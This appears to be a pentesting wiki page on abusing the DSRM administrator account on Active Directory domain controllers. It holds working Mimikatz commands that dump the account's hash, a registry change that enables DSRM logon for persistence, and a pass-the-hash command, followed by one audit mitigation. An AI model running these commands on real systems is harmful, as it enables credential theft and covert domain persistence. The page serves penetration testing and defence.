dsrm-credentials.md (3057B)
1 --- 2 title: "DSRM Credentials" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/dsrm-credentials.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/dsrm-credentials.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # DSRM Credentials 14 15 ## Basic Information 16 17 Every domain controller has a Directory Services Restore Mode (DSRM) administrator account. Its password is set during domain-controller promotion and is separate from Active Directory domain accounts.<sup>[[1]](#references)</sup> 18 19 An attacker with administrative control of a domain controller can dump the local SAM database and recover the DSRM Administrator NTLM hash. The following Mimikatz command performs that operation:<sup>[[2]](#references)</sup> 20 21 ```powershell 22 Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' 23 ``` 24 25 By default, the DSRM account is intended for restore mode. Setting `DsrmAdminLogonBehavior` to `2` permits this local account to authenticate while the domain controller is running normally. Check the value before changing it:<sup>[[2]](#references)[[3]](#references)</sup> 26 27 ```powershell 28 $lsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 29 $current = Get-ItemProperty -Path $lsaPath -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue 30 31 if ($null -eq $current) { 32 New-ItemProperty -Path $lsaPath -Name DsrmAdminLogonBehavior -Value 2 -PropertyType DWORD 33 } else { 34 Set-ItemProperty -Path $lsaPath -Name DsrmAdminLogonBehavior -Value 2 35 } 36 ``` 37 38 The recovered hash can then be used in a pass-the-hash session to access resources such as the administrative `C$` share. For this local account, use the domain controller's computer name as the `/domain` value:<sup>[[3]](#references)</sup> 39 40 ```powershell 41 sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe 42 # In the new PowerShell process, access C$ over NTLM. 43 ls \\dc-host-name\C$ 44 ``` 45 46 ## Mitigation 47 48 - Audit changes to `HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior`. Security event 4657 records a registry value modification when the key's SACL is configured to audit **Set Value** operations.<sup>[[4]](#references)</sup> 49 50 ## References 51 52 - [1] [Microsoft: Reset the Directory Services Restore Mode administrator password](https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/reset-directory-services-restore-mode-admin-pwd) 53 - [2] [ADSecurity: Sneaky Active Directory Persistence #11 — Directory Service Restore Mode](https://adsecurity.org/?p=1714) 54 - [3] [ADSecurity: Sneaky Active Directory Persistence #13 — DSRM Persistence v2](https://adsecurity.org/?p=1785) 55 - [4] [Microsoft: Event 4657 — A registry value was modified](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4657)